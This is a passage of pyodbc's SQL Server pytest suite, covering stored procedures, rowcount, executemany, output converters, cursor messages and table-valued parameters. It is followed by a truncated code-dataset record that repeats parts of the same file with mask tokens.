# Reported in the forums that passing two datetimes to a stored procedure doesn't work.
cursor.execute(
"""
if exists (select * from dbo.sysobjects where id = object_id(N'[test_sp]')
and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[test_sp]
""")
cursor.execute(
"""
create procedure test_sp(@d1 datetime, @d2 datetime)
AS
declare @d as int
set @d = datediff(year, @d1, @d2)
select @d
""")
cursor.execute("exec test_sp ?, ?", datetime.now(), datetime.now())
rows = cursor.fetchall()
assert rows is not None
assert rows[0][0] == 0 # 0 years apart
def test_sp_with_none(cursor: pyodbc.Cursor):
# Reported in the forums that passing None caused an error.
cursor.execute(
"""
if exists (select * from dbo.sysobjects where id = object_id(N'[test_sp]')
and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[test_sp]
""")
cursor.execute(
"""
create procedure test_sp(@x varchar(20))
AS
declare @y varchar(20)
set @y = @x
select @y
""")
cursor.execute("exec test_sp ?", None)
rows = cursor.fetchall()
assert rows is not None
assert rows[0][0] is None # 0 years apart
#
# rowcount
#
def test_rowcount_delete(cursor: pyodbc.Cursor):
assert cursor.rowcount == -1
cursor.execute("create table t1(i int)")
count = 4
for i in range(count):
cursor.execute("insert into t1 values (?)", i)
cursor.execute("delete from t1")
assert cursor.rowcount == count
def test_rowcount_nodata(cursor: pyodbc.Cursor):
"""
This represents a different code path than a delete that deleted something.
The return value is SQL_NO_DATA and code after it was causing an error. We could use
SQL_NO_DATA to step over the code that errors out and drop down to the same SQLRowCount
code. On the other hand, we could hardcode a zero return value.
"""
cursor.execute("create table t1(i int)")
# This is a different code path internally.
cursor.execute("delete from t1")
assert cursor.rowcount == 0
def test_rowcount_select(cursor: pyodbc.Cursor):
"""
Ensure Cursor.rowcount is set properly after a select statement.
pyodbc calls SQLRowCount after each execute and sets Cursor.rowcount, but SQL Server 2005
returns -1 after a select statement, so we'll test for that behavior. This is valid
behavior according to the DB API specification, but people don't seem to like it.
"""
cursor.execute("create table t1(i int)")
count = 4
for i in range(count):
cursor.execute("insert into t1 values (?)", i)
cursor.execute("select * from t1")
assert cursor.rowcount == -1
rows = cursor.fetchall()
assert len(rows) == count
assert cursor.rowcount == -1
def test_rowcount_reset(cursor: pyodbc.Cursor):
"Ensure rowcount is reset after DDL"
cursor.execute("create table t1(i int)")
count = 4
for i in range(count):
cursor.execute("insert into t1 values (?)", i)
assert cursor.rowcount == 1
cursor.execute("create table t2(i int)")
ddl_rowcount = (0 if IS_FREEDTS else -1)
assert cursor.rowcount == ddl_rowcount
def test_retcursor_delete(cursor: pyodbc.Cursor):
cursor.execute("create table t1(i int)")
cursor.execute("insert into t1 values (1)")
v = cursor.execute("delete from t1")
assert v == cursor
def test_retcursor_nodata(cursor: pyodbc.Cursor):
"""
This represents a different code path than a delete that deleted something.
The return value is SQL_NO_DATA and code after it was causing an error. We could use
SQL_NO_DATA to step over the code that errors out and drop down to the same SQLRowCount
code.
"""
cursor.execute("create table t1(i int)")
# This is a different code path internally.
v = cursor.execute("delete from t1")
assert v == cursor
def test_retcursor_select(cursor: pyodbc.Cursor):
cursor.execute("create table t1(i int)")
cursor.execute("insert into t1 values (1)")
v = cursor.execute("select * from t1")
assert v == cursor
def table_with_spaces(cursor: pyodbc.Cursor):
"Ensure we can select using [x z] syntax"
try:
cursor.execute("create table [test one](int n)")
cursor.execute("insert into [test one] values(1)")
cursor.execute("select * from [test one]")
v = cursor.fetchone()[0]
assert v == 1
finally:
cursor.rollback()
def test_lower_case():
"Ensure pyodbc.lowercase forces returned column names to lowercase."
try:
pyodbc.lowercase = True
cnxn = connect()
cursor = cnxn.cursor()
cursor.execute("create table t1(Abc int, dEf int)")
cursor.execute("select * from t1")
names = [t[0] for t in cursor.description]
names.sort()
assert names == ["abc", "def"]
finally:
# Put it back so other tests don't fail.
pyodbc.lowercase = False
def test_row_description(cursor: pyodbc.Cursor):
"""
Ensure Cursor.description is accessible as Row.cursor_description.
"""
cursor.execute("create table t1(a int, b char(3))")
cursor.execute("insert into t1 values(1, 'abc')")
row = cursor.execute("select * from t1").fetchone()
assert cursor.description == row.cursor_description
def test_temp_select(cursor: pyodbc.Cursor):
# A project was failing to create temporary tables via select into.
cursor.execute("create table t1(s char(7))")
cursor.execute("insert into t1 values(?)", "testing")
v = cursor.execute("select * from t1").fetchone()[0]
assert isinstance(v, str)
assert v == "testing"
cursor.execute("select s into t2 from t1")
v = cursor.execute("select * from t1").fetchone()[0]
assert isinstance(v, str)
assert v == "testing"
def test_executemany(cursor: pyodbc.Cursor):
cursor.execute("create table t1(a int, b varchar(10))")
params = [(i, str(i)) for i in range(1, 6)]
cursor.executemany("insert into t1(a, b) values (?,?)", params)
count = cursor.execute("select count(*) from t1").fetchone()[0]
assert count == len(params)
cursor.execute("select a, b from t1 order by a")
rows = cursor.fetchall()
assert count == len(rows)
for param, row in zip(params, rows):
assert param[0] == row[0]
assert param[1] == row[1]
def test_executemany_one(cursor: pyodbc.Cursor):
"Pass executemany a single sequence"
cursor.execute("create table t1(a int, b varchar(10))")
params = [(1, "test")]
cursor.executemany("insert into t1(a, b) values (?,?)", params)
count = cursor.execute("select count(*) from t1").fetchone()[0]
assert count == len(params)
cursor.execute("select a, b from t1 order by a")
rows = cursor.fetchall()
assert count == len(rows)
for param, row in zip(params, rows):
assert param[0] == row[0]
assert param[1] == row[1]
def test_executemany_dae_0(cursor: pyodbc.Cursor):
"""
DAE for 0-length value
"""
cursor.execute("create table t1(a nvarchar(max))")
cursor.fast_executemany = True
cursor.executemany("insert into t1(a) values(?)", [['']])
assert cursor.execute("select a from t1").fetchone()[0] == ''
cursor.fast_executemany = False
def test_executemany_failure(cursor: pyodbc.Cursor):
"""
Ensure that an exception is raised if one query in an executemany fails.
"""
cursor.execute("create table t1(a int, b varchar(10))")
params = [(1, 'good'),
('error', 'not an int'),
(3, 'good')]
with pytest.raises(pyodbc.Error):
cursor.executemany("insert into t1(a, b) value (?, ?)", params)
def test_row_slicing(cursor: pyodbc.Cursor):
cursor.execute("create table t1(a int, b int, c int, d int)")
cursor.execute("insert into t1 values(1,2,3,4)")
row = cursor.execute("select * from t1").fetchone()
result = row[:]
assert result is row
result = row[:-1]
assert result == (1, 2, 3)
result = row[0:4]
assert result is row
def test_row_repr(cursor: pyodbc.Cursor):
cursor.execute("create table t1(a int, b int, c int, d varchar(50))")
cursor.execute("insert into t1 values(1,2,3,'four')")
row = cursor.execute("select * from t1").fetchone()
result = str(row)
assert result == "(1, 2, 3, 'four')"
result = str(row[:-1])
assert result == "(1, 2, 3)"
result = str(row[:1])
assert result == "(1,)"
def test_concatenation(cursor: pyodbc.Cursor):
v2 = '0123456789' * 30
v3 = '9876543210' * 30
cursor.execute("create table t1(c1 int identity(1, 1), c2 varchar(300), c3 varchar(300))")
cursor.execute("insert into t1(c2, c3) values (?,?)", v2, v3)
row = cursor.execute("select c2, c3, c2 + c3 as both from t1").fetchone()
assert row.both == v2 + v3
def test_view_select(cursor: pyodbc.Cursor):
# Reported in forum: Can't select from a view? I think I do this a lot, but another test
# never hurts.
# Create a table (t1) with 3 rows and a view (t2) into it.
cursor.execute("create table t1(c1 int identity(1, 1), c2 varchar(50))")
for i in range(3):
cursor.execute("insert into t1(c2) values (?)", f"string{i}")
cursor.execute("create view t2 as select * from t1")
# Select from the view
cursor.execute("select * from t2")
rows = cursor.fetchall()
assert rows is not None
assert len(rows) == 3
def test_autocommit():
cnxn = connect()
assert cnxn.autocommit is False
cnxn = None
cnxn = connect(autocommit=True)
assert cnxn.autocommit is True
cnxn.autocommit = False
assert cnxn.autocommit is False
def test_sqlserver_callproc(cursor: pyodbc.Cursor):
try:
cursor.execute("drop procedure pyodbctest")
cursor.commit()
except:
pass
cursor.execute("create table t1(s varchar(10))")
cursor.execute("insert into t1 values(?)", "testing")
cursor.execute("""
create procedure pyodbctest @var1 varchar(32)
as
begin
select s from t1
return
end
""")
cursor.execute("exec pyodbctest 'hi'")
def test_skip(cursor: pyodbc.Cursor):
# Insert 1, 2, and 3. Fetch 1, skip 2, fetch 3.
cursor.execute("create table t1(id int)")
for i in range(1, 5):
cursor.execute("insert into t1 values(?)", i)
cursor.execute("select id from t1 order by id")
assert cursor.fetchone()[0] == 1
cursor.skip(2)
assert cursor.fetchone()[0] == 4
def test_timeout():
cnxn = connect()
assert cnxn.timeout == 0 # defaults to zero (off)
cnxn.timeout = 30
assert cnxn.timeout == 30
cnxn.timeout = 0
assert cnxn.timeout == 0
def test_sets_execute(cursor: pyodbc.Cursor):
# Only lists and tuples are allowed.
cursor.execute("create table t1 (word varchar (100))")
words = {'a', 'b', 'c'}
with pytest.raises(pyodbc.ProgrammingError):
cursor.execute("insert into t1 (word) values (?)", words)
with pytest.raises(pyodbc.ProgrammingError):
cursor.executemany("insert into t1 (word) values (?)", words)
def test_row_execute(cursor: pyodbc.Cursor):
"Ensure we can use a Row object as a parameter to execute"
cursor.execute("create table t1(n int, s varchar(10))")
cursor.execute("insert into t1 values (1, 'a')")
row = cursor.execute("select n, s from t1").fetchone()
assert row
cursor.execute("create table t2(n int, s varchar(10))")
cursor.execute("insert into t2 values (?, ?)", row)
def test_row_executemany(cursor: pyodbc.Cursor):
"Ensure we can use a Row object as a parameter to executemany"
cursor.execute("create table t1(n int, s varchar(10))")
for i in range(3):
cursor.execute("insert into t1 values (?, ?)", i, chr(ord('a') + i))
rows = cursor.execute("select n, s from t1").fetchall()
assert len(rows) != 0
cursor.execute("create table t2(n int, s varchar(10))")
cursor.executemany("insert into t2 values (?, ?)", rows)
def test_description(cursor: pyodbc.Cursor):
"Ensure cursor.description is correct"
cursor.execute("create table t1(n int, s varchar(8), d decimal(5,2))")
cursor.execute("insert into t1 values (1, 'abc', '1.23')")
cursor.execute("select * from t1")
# (I'm not sure the precision of an int is constant across different versions, bits, so I'm
# hand checking the items I do know.
# int
t = cursor.description[0]
assert t[0] == 'n'
assert t[1] == int
assert t[5] == 0 # scale
assert t[6] is True # nullable
# varchar(8)
t = cursor.description[1]
assert t[0] == 's'
assert t[1] == str
assert t[4] == 8 # precision
assert t[5] == 0 # scale
assert t[6] is True # nullable
# decimal(5, 2)
t = cursor.description[2]
assert t[0] == 'd'
assert t[1] == Decimal
assert t[4] == 5 # precision
assert t[5] == 2 # scale
assert t[6] is True # nullable
def test_cursor_messages_with_print(cursor: pyodbc.Cursor):
"""
Ensure the Cursor.messages attribute is handled correctly with a simple PRINT statement.
"""
assert not cursor.messages
# SQL Server PRINT statements are never more than 8000 characters
# https://docs.microsoft.com/en-us/sql/t-sql/language-elements/print-transact-sql#remarks
for msg in ('hello world', 'ABCDEFGHIJ' * 800):
cursor.execute(f"PRINT '{msg}'")
messages = cursor.messages
assert isinstance(messages, list)
assert len(messages) == 1
assert isinstance(messages[0], tuple)
assert len(messages[0]) == 2
assert isinstance(messages[0][0], str)
assert isinstance(messages[0][1], str)
assert '[01000] (0)' == messages[0][0]
assert messages[0][1].endswith(msg)
def test_cursor_messages_with_stored_proc(cursor: pyodbc.Cursor):
"""
Complex scenario to test the Cursor.messages attribute.
"""
cursor.execute("""
create or alter procedure test_cursor_messages as
begin
set nocount on;
print 'Message 1a';
print 'Message 1b';
select N'Field 1a' AS F UNION ALL SELECT N'Field 1b';
select N'Field 2a' AS F UNION ALL SELECT N'Field 2b';
print 'Message 2a';
print 'Message 2b';
end
""")
# The messages will look like:
#
# [Microsoft][ODBC Driver 18 for SQL Server][SQL Server]Message 1a
# result set 1: messages, rows
cursor.execute("exec test_cursor_messages")
vals = [row[0] for row in cursor.fetchall()]
assert vals == ['Field 1a', 'Field 1b']
msgs = [
re.search(r'Message \d[ab]$', m[1]).group(0)
for m in cursor.messages
]
assert msgs == ['Message 1a', 'Message 1b']
# result set 2: rows, no messages
assert cursor.nextset()
vals = [row[0] for row in cursor.fetchall()]
assert vals == ['Field 2a', 'Field 2b']
assert not cursor.messages
# result set 3: messages, no rows
assert cursor.nextset()
with pytest.raises(pyodbc.ProgrammingError):
cursor.fetchall()
msgs = [
re.search(r'Message \d[ab]$', m[1]).group(0)
for m in cursor.messages
]
assert msgs == ['Message 2a', 'Message 2b']
# result set 4: no rows, no messages
assert not cursor.nextset()
with pytest.raises(pyodbc.ProgrammingError):
cursor.fetchall()
assert not cursor.messages
def test_none_param(cursor: pyodbc.Cursor):
"Ensure None can be used for params other than the first"
# Some driver/db versions would fail if NULL was not the first parameter because
# SQLDescribeParam (only used with NULL) could not be used after the first call to
# SQLBindParameter. This means None always worked for the first column, but did not work
# for later columns.
#
# If SQLDescribeParam doesn't work, pyodbc would use VARCHAR which almost always worked.
# However, binary/varbinary won't allow an implicit conversion.
cursor.execute("create table t1(n int, blob varbinary(max))")
cursor.execute("insert into t1 values (1, newid())")
row = cursor.execute("select * from t1").fetchone()
assert row.n == 1
assert isinstance(row.blob, bytes)
sql = "update t1 set n=?, blob=?"
try:
cursor.execute(sql, 2, None)
except pyodbc.DataError:
if IS_FREEDTS:
# cnxn.getinfo(pyodbc.SQL_DESCRIBE_PARAMETER) returns False for FreeTDS, so pyodbc
# can't call SQLDescribeParam to get the correct parameter type. This can lead to
# errors being returned from SQL Server when sp_prepexec is called, e.g., "Implicit
# conversion from data type varchar to varbinary(max) is not allowed."
#
# So at least verify that the user can manually specify the parameter type
cursor.setinputsizes([(), (pyodbc.SQL_VARBINARY, None, None)])
cursor.execute(sql, 2, None)
else:
raise
row = cursor.execute("select * from t1").fetchone()
assert row.n == 2
assert row.blob is None
def test_output_conversion():
def convert1(value):
# The value is the raw bytes (as a bytes object) read from the
# database. We'll simply add an X at the beginning at the end.
return 'X' + value.decode('latin1') + 'X'
def convert2(value):
# Same as above, but add a Y at the beginning at the end.
return 'Y' + value.decode('latin1') + 'Y'
cnxn = connect()
cursor = cnxn.cursor()
cursor.execute("create table t1(n int, v varchar(10))")
cursor.execute("insert into t1 values (1, '123.45')")
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == 'X123.45X'
# Clear all conversions and try again. There should be no Xs this time.
cnxn.clear_output_converters()
value = cursor.execute("select v from t1").fetchone()[0]
assert value == '123.45'
# Same but clear using remove_output_converter.
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == 'X123.45X'
cnxn.remove_output_converter(pyodbc.SQL_VARCHAR)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == '123.45'
# Clear via add_output_converter, passing None for the converter function.
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == 'X123.45X'
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, None)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == '123.45'
# retrieve and temporarily replace converter (get_output_converter)
#
# case_1: converter already registered
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == 'X123.45X'
prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)
assert prev_converter is not None
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == 'Y123.45Y'
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == 'X123.45X'
#
# case_2: no converter already registered
cnxn.clear_output_converters()
value = cursor.execute("select v from t1").fetchone()[0]
assert value == '123.45'
prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)
assert prev_converter is None
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == 'Y123.45Y'
cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)
value = cursor.execute("select v from t1").fetchone()[0]
assert value == '123.45'
def test_too_large(cursor: pyodbc.Cursor):
"""Ensure error raised if insert fails due to truncation"""
value = 'x' * 1000
cursor.execute("create table t1(s varchar(800))")
with pytest.raises(pyodbc.Error):
cursor.execute("insert into t1 values (?)", value)
def test_row_equal(cursor: pyodbc.Cursor):
cursor.execute("create table t1(n int, s varchar(20))")
cursor.execute("insert into t1 values (1, 'test')")
row1 = cursor.execute("select n, s from t1").fetchone()
row2 = cursor.execute("select n, s from t1").fetchone()
assert row1 == row2
def test_row_gtlt(cursor: pyodbc.Cursor):
cursor.execute("create table t1(n int, s varchar(20))")
cursor.execute("insert into t1 values (1, 'test1')")
cursor.execute("insert into t1 values (1, 'test2')")
rows = cursor.execute("select n, s from t1 order by s").fetchall()
assert rows[0] < rows[1]
assert rows[0] <= rows[1]
assert rows[1] > rows[0]
assert rows[1] >= rows[0]
assert rows[0] != rows[1]
rows = list(rows)
rows.sort() # uses <
def test_context_manager_success():
"Ensure `with` commits if an exception is not raised"
cnxn = connect()
cursor = cnxn.cursor()
cursor.execute("create table t1(n int)")
cnxn.commit()
with cnxn:
cursor.execute("insert into t1 values (1)")
rows = cursor.execute("select n from t1").fetchall()
assert len(rows) == 1
assert rows[0][0] == 1
def test_context_manager_failure(cursor: pyodbc.Cursor):
"Ensure `with` rolls back if an exception is raised"
cnxn = connect()
cursor = cnxn.cursor()
# We'll insert a row and commit it. Then we'll insert another row followed by an
# exception.
cursor.execute("create table t1(n int)")
cursor.execute("insert into t1 values (1)")
cnxn.commit()
with pytest.raises(pyodbc.Error):
with cnxn:
cursor.execute("insert into t1 values (2)")
cursor.execute("delete from bogus")
cursor.execute("select max(n) from t1")
val = cursor.fetchval()
assert val == 1
def test_untyped_none(cursor: pyodbc.Cursor):
# From issue 129
value = cursor.execute("select ?", None).fetchone()[0]
assert value is None
def test_large_update_nodata(cursor: pyodbc.Cursor):
cursor.execute('create table t1(a varbinary(max))')
hundredkb = b'x' * 100 * 1024
cursor.execute('update t1 set a=? where 1=0', (hundredkb,))
def test_func_param(cursor: pyodbc.Cursor):
try:
cursor.execute("drop function func1")
except:
pass
cursor.execute("""
create function func1 (@testparam varchar(4))
returns @rettest table (param varchar(4))
as
begin
insert @rettest
select @testparam
return
end
""")
cursor.commit()
value = cursor.execute("select * from func1(?)", 'test').fetchone()[0]
assert value == 'test'
def test_columns(cursor: pyodbc.Cursor):
# When using aiohttp, `await cursor.primaryKeys('t1')` was raising the error
#
# Error: TypeError: argument 2 must be str, not None
#
# I'm not sure why, but PyArg_ParseTupleAndKeywords fails if you use "|s" for an
# optional string keyword when calling indirectly.
cursor.execute("create table t1(a int, b varchar(3), xΏz varchar(4))")
cursor.columns('t1')
results = {row.column_name: row for row in cursor}
row = results['a']
assert row.type_name == 'int', row.type_name
row = results['b']
assert row.type_name == 'varchar'
assert row.column_size == 3
# Now do the same, but specifically pass in None to one of the keywords. Old versions
# were parsing arguments incorrectly and would raise an error. (This crops up when
# calling indirectly like columns(*args, **kwargs) which aiodbc does.)
cursor.columns('t1', schema=None, catalog=None)
results = {row.column_name: row for row in cursor}
row = results['a']
assert row.type_name == 'int', row.type_name
row = results['b']
assert row.type_name == 'varchar'
assert row.column_size == 3
row = results['xΏz']
assert row.type_name == 'varchar'
assert row.column_size == 4, row.column_size
for i in range(8, 16):
table_name = 'pyodbc_89abcdef'[:i]
cursor.execute(f"""
IF OBJECT_ID (N'{table_name}', N'U') IS NOT NULL DROP TABLE {table_name};
CREATE TABLE {table_name} (id INT PRIMARY KEY);
""")
col_count = len([col.column_name for col in cursor.columns(table_name)])
assert col_count == 1
cursor.execute(f"drop table {table_name}")
def test_cancel(cursor: pyodbc.Cursor):
# I'm not sure how to reliably cause a hang to cancel, so for now we'll settle with
# making sure SQLCancel is called correctly.
cursor.execute("select 1")
cursor.cancel()
def test_emoticons_as_parameter(cursor: pyodbc.Cursor):
# https://github.com/mkleehammer/pyodbc/issues/423
#
# When sending a varchar parameter, pyodbc is supposed to set ColumnSize to the number
# of characters. Ensure it works even with 4-byte characters.
#
# http://www.fileformat.info/info/unicode/char/1f31c/index.htm
v = "x \U0001F31C z"
cursor.execute("create table t1(s nvarchar(100))")
cursor.execute("insert into t1 values (?)", v)
result = cursor.execute("select s from t1").fetchone()[0]
assert result == v
def test_emoticons_as_literal(cursor: pyodbc.Cursor):
# similar to `test_emoticons_as_parameter`, above, except for Unicode literal
#
# http://www.fileformat.info/info/unicode/char/1f31c/index.htm
# FreeTDS ODBC issue fixed in version 1.1.23
# https://github.com/FreeTDS/freetds/issues/317
v = "x \U0001F31C z"
cursor.execute("create table t1(s nvarchar(100))")
cursor.execute(f"insert into t1 values (N'{v}')")
result = cursor.execute("select s from t1").fetchone()[0]
assert result == v
def _test_tvp(cursor: pyodbc.Cursor, diff_schema):
# Test table value parameters (TVP). I like the explanation here:
#
# https://www.mssqltips.com/sqlservertip/1483/using-table-valued-parameters-tvp-in-sql-server/
#
# "At a high level the TVP allows you to populate a table declared as a T-SQL variable,
# then pass that table as a parameter to a stored procedure or function."
#
# "The TVP must be declared READONLY. You cannot perform any DML (i.e. INSERT, UPDATE,
# DELETE) against the TVP; you can only reference it in a SELECT statement."
#
# In this test we'll create a table, pass it to a stored procedure, and have the stored
# procedure simply return the rows from the TVP.
#
# Apparently the way pyodbc knows something is a TVP is because it is in a sequence. I'm
# not sure I like that as it is very generic and specific to SQL Server. It would be wiser
# to define a wrapper pyodbc.TVP or pyodbc.Table object, similar to the DB APIs `Binary`
# object.
pyodbc.native_uuid = True
# This is the default, but we'll reset it in case a previous test fails to.
procname = 'SelectTVP'
typename = 'TestTVP'
if diff_schema:
schemaname = 'myschema'
procname = schemaname + '.' + procname
typenameonly = typename
typename = schemaname + '.' + typename
# (Don't use "if exists" since older SQL Servers don't support it.)
try:
cursor.execute("drop procedure " + procname)
except:
pass
try:
cursor.execute("drop type " + typename)
except:
pass
if diff_schema:
try:
cursor.execute("drop schema " + schemaname)
except:
pass
cursor.commit()
if diff_schema:
cursor.execute("CREATE SCHEMA myschema")
cursor.commit()
cursor.execute(
f"""
CREATE TYPE {typename} AS TABLE(
c01 VARCHAR(255),
c02 VARCHAR(MAX),
c03 VARBINARY(255),
c04 VARBINARY(MAX),
c05 BIT,
c06 DATE,
c07 TIME,
c08 DATETIME2(5),
c09 BIGINT,
c10 FLOAT,
c11 NUMERIC(38, 24),
c12 UNIQUEIDENTIFIER)
""")
cursor.commit()
cursor.execute(
f"""
CREATE PROCEDURE {procname} @TVP {typename} READONLY
AS SELECT * FROM @TVP;
""")
cursor.commit()
# The values aren't exactly VERY_LONG_LEN but close enough and *significantly* faster than
# the loop we had before.
VERY_LONG_LEN = 2000000
long_string = ''.join(chr(i) for i in range(32, 127)) # printable characters
long_bytearray = bytes(list(range(255)))
very_long_string = long_string * (VERY_LONG_LEN // len(long_string))
very_long_bytearray = long_bytearray * (VERY_LONG_LEN // len(long_bytearray))
params = [
# Three rows with all of the types in the table defined above.
(
'abc', 'abc',
bytes([0xD1, 0xCE, 0xFA, 0xCE]),
bytes([0x0F, 0xF1, 0xCE, 0xCA, 0xFE]), True,
date(1997, 8, 29), time(9, 13, 39),
datetime(2018, 11, 13, 13, 33, 26, 298420),
1234567, 3.14, Decimal('31234567890123.141243449787580175325274'),
uuid.UUID('4fe34a93-e574-04cc-200a-353f0d1770b1'),
),
(
'', '',
bytes([0x00, 0x01, 0x02, 0x03, 0x04]),
bytes([0x00, 0x01, 0x02, 0x03, 0x04, 0x05]), False,
date(1, 1, 1), time(0, 0, 0),
datetime(1, 1, 1, 0, 0, 0, 0),
-9223372036854775808, -1.79E+308, Decimal('0.000000000000000000000001'),
uuid.UUID('33f7504c-2bac-1b83-01d1-7434a7ba6a17'),
),
(
long_string, very_long_string,
bytes(long_bytearray), bytes(very_long_bytearray), True,
date(9999, 12, 31), time(23, 59, 59),
datetime(9999, 12, 31, 23, 59, 59, 999990),
9223372036854775807, 1.79E+308, Decimal('99999999999999.999999999999999999999999'),
uuid.UUID('ffffffff-ffff-ffff-ffff-ffffffffffff'),
)
]
if diff_schema:
p1 = [[typenameonly, schemaname] + params]
else:
p1 = [params]
result_array = [tuple(row) for row in cursor.execute(f"exec {procname} ?", p1).fetchall()]
# The values make it very difficult to troubleshoot if something is wrong, so instead of
# asserting they are the same, we'll walk them if there is a problem to identify which is
# wrong.
for row, param in zip(result_array, params):
if row != param:
for r, p in zip(row, param):
assert r == p
# Now test with zero rows.
params = []
p1 = [params]
if diff_schema:
p1 = [[typenameonly, schemaname] + params]
else:
p1 = [params]
result_array = cursor.execute(f"exec {procname} ?", p1).fetchall()
assert result_array == params
@pytest.mark.skipif(IS_FREEDTS, reason='FreeTDS does not support TVP')
def test_tvp(cursor: pyodbc.Cursor):
_test_tvp(cursor, False)
@pytest.mark.skipif(IS_FREEDTS, reason='FreeTDS does not support TVP')
def test_tvp_diffschema(cursor: pyodbc.Cursor):
_test_tvp(cursor, True)
def get_sqlserver_version(cursor: pyodbc.Cursor):
"""
Returns the major version: 8-->2000, 9-->2005, 10-->2008
"""
cursor.execute("exec master..xp_msver 'ProductVersion'")
row = cursor.fetchone()
return int(row.Character_Value.split('.', 1)[0])
@lru_cache()
def _generate_str(length, encoding=None):
"""
Returns either a string or bytes, depending on whether encoding is provided,
that is `length` elements long.
If length is None, None is returned. This simplifies the tests by letting us put None into
an array of other lengths and pass them here, moving the special case check into one place.
"""
if length is None:
return None
# Put non-ASCII characters at the front so we don't end up chopping one in half in a
# multi-byte encoding like UTF-8.
v = 'á'
remaining = max(0, length - len(v))
if remaining:
seed = '0123456789-abcdefghijklmnopqrstuvwxyz-'
if remaining <= len(seed):
v += seed
else:
c = (remaining + len(seed) - 1 // len(seed))
v += seed * c
if encoding:
v = v.encode(encoding)
# We chop *after* encoding because if we are encoding then we want bytes.
v = v[:length]
return v
|
normal
|
{
"blob_id": "51358ac7d4fc093f8291cfd9f098e3ac3db86cce",
"index": 8282,
"step-1": "<mask token>\n\n\ndef connect(autocommit=False, attrs_before=None):\n return pyodbc.connect(CNXNSTR, autocommit=autocommit, attrs_before=\n attrs_before)\n\n\n<mask token>\n\n\ndef test_nvarchar(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'nvarchar')\n\n\ndef test_varbinary(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'varbinary')\n\n\n<mask token>\n\n\ndef test_int(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'int', [None, -1, 0, 1, 12345678])\n\n\ndef test_bigint(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'bigint', [None, -1, 0, 1, 4886718345, 2147483647,\n 4294967295, 4886718345])\n\n\ndef test_overflow_int(cursor: pyodbc.Cursor):\n input = 9999999999999999999999999999999999999\n cursor.execute('create table t1(d bigint)')\n with pytest.raises(OverflowError):\n cursor.execute('insert into t1 values (?)', input)\n result = cursor.execute('select * from t1').fetchall()\n assert result == []\n\n\n<mask token>\n\n\ndef test_drivers():\n p = pyodbc.drivers()\n assert isinstance(p, list)\n\n\ndef test_datasources():\n p = pyodbc.dataSources()\n assert isinstance(p, dict)\n\n\n<mask token>\n\n\ndef test_getinfo_bool():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_ACCESSIBLE_TABLES)\n assert isinstance(value, bool)\n\n\ndef test_getinfo_int():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_DEFAULT_TXN_ISOLATION)\n assert isinstance(value, int)\n\n\ndef test_getinfo_smallint():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_CONCAT_NULL_BEHAVIOR)\n assert isinstance(value, int)\n\n\ndef test_no_fetch(cursor: pyodbc.Cursor):\n cursor.execute('select 1')\n cursor.execute('select 1')\n cursor.execute('select 1')\n\n\n<mask token>\n\n\ndef test_multiple_bindings(cursor: pyodbc.Cursor):\n \"\"\"More than one bind and select on a cursor\"\"\"\n cursor.execute('create table t1(n int)')\n cursor.execute('insert into t1 values (?)', 1)\n cursor.execute('insert into t1 values (?)', 2)\n cursor.execute('insert into t1 values (?)', 3)\n for _ in range(3):\n cursor.execute('select n from t1 where n < ?', 10)\n cursor.execute('select n from t1 where n < 3')\n\n\n<mask token>\n\n\ndef _test_vartype(cursor: pyodbc.Cursor, datatype):\n if datatype == 'text':\n lengths = LARGE_FENCEPOST_SIZES\n else:\n lengths = SMALL_FENCEPOST_SIZES\n if datatype == 'text':\n cursor.execute(f'create table t1(c1 {datatype})')\n else:\n maxlen = lengths[-1]\n cursor.execute(f'create table t1(c1 {datatype}({maxlen}))')\n for length in lengths:\n cursor.execute('delete from t1')\n encoding = datatype in ('blob', 'varbinary') and 'utf8' or None\n value = _generate_str(length, encoding=encoding)\n try:\n cursor.execute('insert into t1 values(?)', value)\n except pyodbc.Error as ex:\n msg = f'{datatype} insert failed: length={length} len={len(value)}'\n raise Exception(msg) from ex\n v = cursor.execute('select * from t1').fetchone()[0]\n assert v == value\n\n\n<mask token>\n\n\ndef test_noscan(cursor: pyodbc.Cursor):\n assert cursor.noscan is False\n cursor.noscan = True\n assert cursor.noscan is True\n\n\n<mask token>\n\n\ndef test_native_uuid(cursor: pyodbc.Cursor):\n value = uuid.uuid4()\n cursor.execute('create table t1(n uniqueidentifier)')\n cursor.execute('insert into t1 values (?)', value)\n pyodbc.native_uuid = True\n result = cursor.execute('select n from t1').fetchval()\n assert isinstance(result, uuid.UUID)\n assert value == result\n\n\n<mask token>\n\n\[email protected](IS_FREEDTS, reason=\n 'https://github.com/FreeTDS/freetds/issues/230')\ndef test_nextset_with_raiserror(cursor: pyodbc.Cursor):\n cursor.execute(\"select i = 1; RAISERROR('c', 16, 1);\")\n row = next(cursor)\n assert 1 == row.i\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.nextset()\n\n\n<mask token>\n\n\ndef test_bit(cursor: 